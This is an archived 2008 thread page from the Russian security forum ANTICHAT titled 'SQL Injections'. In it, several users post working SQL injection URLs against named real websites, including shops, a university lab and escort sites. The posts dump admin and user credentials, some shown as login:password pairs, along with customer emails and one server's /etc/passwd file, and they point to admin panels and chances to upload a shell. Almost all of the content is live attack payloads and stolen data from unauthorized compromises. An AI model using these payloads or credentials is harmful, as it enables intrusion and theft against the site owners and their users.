ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу SQL Инъекции
   
 
Страница 615 из 1242 « Первая < 115515565605 611 612 613 614 615 616 617 618 619 6256657151115 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #6141  
Старый 31.07.2008, 08:58
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию
Paraavis.com - PR 4
Цитата:
http://www.paraavis.com/index1.php?id=259+union+select+1,2,table_name,4,5, 6+from+information_schema.tables/*&secid=368&mainid=255
5 версия, смотрим таблы..
Цитата:
http://www.paraavis.com/index1.php?id=259+union+select+1,2,concat_ws(0x3a, username,user_password,user_id),4,5,6+from+phpbb_u sers+where+user_level=1/*&secid=368&mainid=255
увидев phpbb я сразу кинулся заливать шелл... но тут неудача.... аватарка не загружается и востановления бд не рабоатет......
planer;patagonia
Цитата:
http://www.paraavis.com/index1.php?id=259+union+select+1,2,concat_ws(0x3a, members_l_username,member_login_key),4,5,6+from+pa raavis.ibf_members/*&secid=368&mainid=255
дальше.. я увидел таблы с IPB но сам форум так и не нашел...
Цитата:
http://www.paraavis.com/index1.php?id=259+union+select+1,2,concat_ws(0x3a, converge_email,converge_pass_hash,converge_pass_sa lt),4,5,6+from+paraavis.ibf_members_converge/*&secid=368&mainid=255
пасс и соль поидее....
Цитата:
http://www.paraavis.com/index1.php?id=259+union+select+1,2,concat_ws(0x3a, email,pwd),4,5,6+from+paraavis.avgdusers/*&secid=368&mainid=255
какието юзеры..
Цитата:
http://www.paraavis.com/index1.php?id=259+union+select+1,2,concat_ws(0x3a, nick,password,email),4,5,6+from+paraavis.users_01/*&secid=368&mainid=255
еще юзеры..


Newprint.ru
Цитата:
http://www.newprint.ru/forum/discuss.asp?discID=1+or+1=(SELECT+TOP+1+TABLE_NAME +FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+N OT+IN+('views'))--
нелюблю я мелких...... но приходится)
Цитата:
http://www.newprint.ru/forum/discuss.asp?discID=1+or+1=(SELECT+TOP+1+COLUMN_NAM E+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME ='db_Admin'+and+column_name+NOT+IN+('isAdmin','Las tLogin','Login','Password'))--
вот нужная там табла.. и колонка к ней...
Цитата:
http://www.newprint.ru/forum/discuss.asp?discID=1+or+1=(SELECT+TOP+1+Login+from +db_Admin)--
Цитата:
http://www.newprint.ru/forum/discuss.asp?discID=1+or+1=(SELECT+TOP+1+Password+f rom+db_Admin)--
админка
Последний раз редактировалось sabe; 31.07.2008 в 19:47..
 

  #6142  
Старый 31.07.2008, 12:48
nicusor
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
Провел на форуме:
1357043

Репутация: 137
По умолчанию
www.scrapbookingmemories.com.au


user(): express_db1@web1.expresspublications.com.au
version(): 4.1.20
database(): showcase_sbm

file_priv = Y но права поставлены так что не читаются файлы пользователей :)
/etc/passwd читается, если верить /etc/redhat-release то система Red Hat Enterprise Linux ES release 4 (Nahant Update 5)

http://www.scrapbookingmemories.com.au/scraproom/index.php?content=album&user=24377777777777+union+ select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,u sername,password,email),14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31/**/from/**/users/**/limit/**/2,1/*&coll=1003

count from users = 2874
пароли в чистом виде

доп. инфо:

/home/scrap/public_html/scraproom/global_includes/select.php

Код:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
phpmyadmin:x:500:500::/home/phpmyadmin:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
Последний раз редактировалось nicusor; 31.07.2008 в 12:50..
 

  #6143  
Старый 31.07.2008, 14:10
USAkid
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766

Репутация: 228
По умолчанию
Цитата:
Сообщение от sabe  
Newprint.ru

boss;mura - кто нашел админку отзовитесь..)
Сервер там Microsoft-IIS/6.0 стоит.
Лови админку:

http://www.newprint.ru/_admin/

Только чот она грузится долго( У меня такое чувство, то они специально "зашифровались" :-D ... По моему еще какой-то файлик идет после /_admin/ ... .
Но путь админки - 100%
 

  #6144  
Старый 31.07.2008, 16:25
prescott
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
Провел на форуме:
728470

Репутация: 115
По умолчанию
http://www.remeco.ru/shops/index.php?cid=500109999+union+select+1,mail,3,4+fr om+us/*&sale=3&order=

Мылы покупателей кому нада... Пассы манагеров нашел, админов нет( Потому что саму админку найти не могу... файлприв вроде нету(
 

  #6145  
Старый 31.07.2008, 17:38
Snap
Познающий
Регистрация: 05.02.2007
Сообщений: 71
Провел на форуме:
423288

Репутация: 82
Отправить сообщение для Snap с помощью ICQ
По умолчанию
Для тех у кого уже руки трясутся =)

http://putana.nu
http://putana.nu/list.php?link=-30545+union+select+1,concat(login,char(58),pass),3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43+from+users+limit+1,1/*
Login: rdvi02
Pass: 247580

http://sexrobot.ru
http://sexrobot.[B]ru/list.php?link=711+union+select+1,concat(login,char (58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580

http://pentboy.ru
http://pentboy.ru/list.php?link=34637+union+select+1,concat(login,ch ar(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580

http://robosex.ru
http://robosex.ru/list.php?link=30545+union+select+1,concat(login,ch ar(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580

http://magdalina.ru
http://magdalina.ru/list.php?link=30545+union+select+1,concat(login,ch ar(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580

http://dosugspb.ru
http://dosugspb.ru/list.php?link=37849+union+select+1,concat(login,ch ar(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580

http://sexmodeli.org
http://sexmodeli.org/list.php?link=30545+union+select+1,concat(login,ch ar(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580

http://sexmodeli.net
http://sexmodeli.net/list.php?link=30545+union+select+1,concat(login,ch ar(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580

http://sexmodeli.ru
http://sexmodeli.ru/list.php?link=30545+union+select+1,concat(login,ch ar(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580

http://intimuslugi.org
http://intimuslugi.org/list.php?link=30545+union+select+1,concat(login,ch ar(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580

http://intimuslugi.net
http://intimuslugi.net/list.php?link=30545+union+select+1,concat(login,ch ar(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580

http://magdalina.org
http://magdalina.org/list.php?link=30545+union+select+1,concat(login,ch ar(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580

http://intimdosug.org
http://intimdosug.org/list.php?link=30545+union+select+1,concat(login,ch ar(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580

http://mskputana.ru
http://mskputana.ru/list.php?link=30545+union+select+1,concat(login,ch ar(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580

http://spbputana.ru
http://spbputana.ru/list.php?link=37849+union+select+1,concat(login,ch ar(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580

http://dosugmsk.ru
http://dosugmsk.ru/list.php?link=30545+union+select+1,concat(login,ch ar(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
rdvi01:247580
 

  #6146  
Старый 31.07.2008, 17:54
nicusor
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
Провел на форуме:
1357043

Репутация: 137
По умолчанию
Цитата:
Сообщение от prescott  
http://www.remeco.ru/shops/index.php?cid=500109999+union+select+1,mail,3,4+fr om+us/*&sale=3&order=

Мылы покупателей кому нада... Пассы манагеров нашел, админов нет( Потому что саму админку найти не могу... файлприв вроде нету(
админка
http://www.remeco.ru/login.php
но не работает


все таблицы
http://www.remeco.ru/shops/index.php?cid=500109999+union+select+1,table_name, 3,4+from+information_schema.tables/**/limit/**/16,99999/*&sale=3&order=


манагеры
http://www.remeco.ru/shops/index.php?cid=500109999+union+select+1,concat_ws(0 x3a,name,login,pwd,mail),3,4+from+manager/*&sale=3&order=


пользователи из user1
http://www.remeco.ru/shops/index.php?cid=500109999+union+select+1,concat_ws(0 x3a,id,name,mail,inn,passwd,score,status),3,4+from +user1/*&sale=3&order=
Последний раз редактировалось nicusor; 31.07.2008 в 17:59..
 

  #6147  
Старый 31.07.2008, 20:03
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию
WarLib.ru - PR 5
Цитата:
http://top.warlib.ru/rate.php?site=-1182421676+union+select+version(),2/*
PicHost.ru
Цитата:
http://www.pichost.ru/?showlinks=1&viewmode=0&gallery_id=999999999'+unio n+select+1,unhex(hex(table_name)),3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17+from+information_schema.tabl es/*
5 ветка..
Цитата:
http://www.pichost.ru/?showlinks=1&viewmode=0&gallery_id=99999999'+union +select+1,concat_ws(0x3a,user,pass),3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17+from+users/*
юзеры.. но с выводом туповато.. (
Последний раз редактировалось sabe; 31.07.2008 в 23:45..
 

  #6148  
Старый 31.07.2008, 21:49
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
По умолчанию
expert.com.ua (193.178.145.3)

Яндекс тИЦ 1200

Path: /var/www/expert/expert.com.ua/index.php

Database Version: 4.1.22-log
Database name: expert
User name: u_expert@localhost

Цитата:
http://expert.com.ua/index.php?option=news&id=361'+UNION+SELECT+1,conca t_ws(0x203a20,database(),user()),3,version(),5,6/*6&dir=2
Привилегии файл запрещены (
 

  #6149  
Старый 01.08.2008, 00:30
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию
ItLab.unn.ru - PR 5
Нижегородский государственный университет им.Н.И.Лобачевского.
ЛАБОРАТОРИЯ ИНФОРМАЦИОННЫЕ ТЕХНОЛОГИИ .
Факультет вычислительной математики и кибернетики.
Цитата:
http://itlab.unn.ru/?dir=999999+union+select+1,2,table_name+from+infor mation_schema.tables/*
5 ветка и таблы..
Цитата:
http://itlab.unn.ru/?dir=9999999999+union+select+1,2,unhex(hex(concat_ ws(0x3a,id,login,passwd,email)))+from+us_users/*
админка
Цитата:
http://itlab.unn.ru/?dir=9999999999+union+select+1,2,unhex(hex(concat_ ws(0x3a,id,login,passwd,email)))+from+compiler.us_ users/*
юзеры из другой базы..
Цитата:
http://itlab.unn.ru/?dir=9999999999+union+select+1,2,unhex(hex(concat_ ws(0x3a,id,login,passwd,email)))+from+telma.us_use rs+limit+7,1/*
другие юзеры..


Software.unn.ac.ru
Цитата:
http://www.software.unn.ac.ru/?dir=99999999+union+select+1,2,concat_ws(0x3a,logi n,passwd)+from+mo_evm.us_users/*
software.unn.ac.ru/manager/

также сдесь: Unn.ru - PR 6
Цитата:
http://unn.ru/graduates/?main=graduates&sub=registration
при регистрации можно залить шелл... токо исполнение не полное.. можно чтот придумать..
Последний раз редактировалось sabe; 01.08.2008 в 00:55..
 

  #6150  
Старый 01.08.2008, 02:47
MirA
Новичок
Регистрация: 24.07.2008
Сообщений: 29
Провел на форуме:
109513

Репутация: 52
Отправить сообщение для MirA с помощью ICQ
По умолчанию
www.effective.net.ua

Яндекс тИЦ - 30

version() = 4.0.27-log
database() = effectiv_effe
user() = effectiv_effe@localhost

Цитата:
http://www.effective.net.ua/lots.php?t=4&t2=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws( char(32,58,32),version(),user(),database()),30,31, 32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 ,49,50+from+users/*

http://m2.com.ua

3 ветка

Цитата:
http://m2.com.ua/article_list.php?id=77+and+3=substring(version(),1 ,1)/*&PHPSESSID=959d18e46fbe55006f5cb3c40f4e6f25
http://www.kiis.com.ua

version() = 5.0.37-log
user() = kiis@sleipnir.carrier.kiev.ua
database() = kiis

Цитата:
http://www.kiis.com.ua/?id=2&sp=1+union+select+1,2,3,4,concat_ws(char(32, 58,32),version(),user(),database()),6,7,8,9/*
Последний раз редактировалось MirA; 01.08.2008 в 04:25..
 
 
Страница 615 из 1242 « Первая < 115515565605 611 612 613 614 615 616 617 618 619 6256657151115 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ